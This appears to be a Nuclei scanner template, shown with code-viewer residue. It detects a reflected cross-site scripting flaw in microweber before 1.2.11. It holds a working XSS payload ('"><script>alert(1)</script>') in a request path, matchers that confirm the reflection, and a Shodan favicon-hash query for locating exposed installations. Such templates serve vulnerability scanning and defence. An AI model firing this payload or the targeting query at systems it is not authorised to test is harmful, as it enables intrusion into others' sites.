29 lines
686 B
YAML
29 lines
686 B
YAML
|
id: microweber-xss
|
||
|
|
||
|
info:
|
||
|
name: Microweber XSS
|
||
|
author: gy741
|
||
|
severity: medium
|
||
|
description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
|
||
|
reference:
|
||
|
- https://github.com/microweber/microweber/issues/809
|
||
|
tags: microweber,xss
|
||
|
metadata:
|
||
|
shodan-query: 'http.favicon.hash:780351152'
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(1)</script>¶ms=filetype=images#path='
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- '<script>alert(1)</script>'
|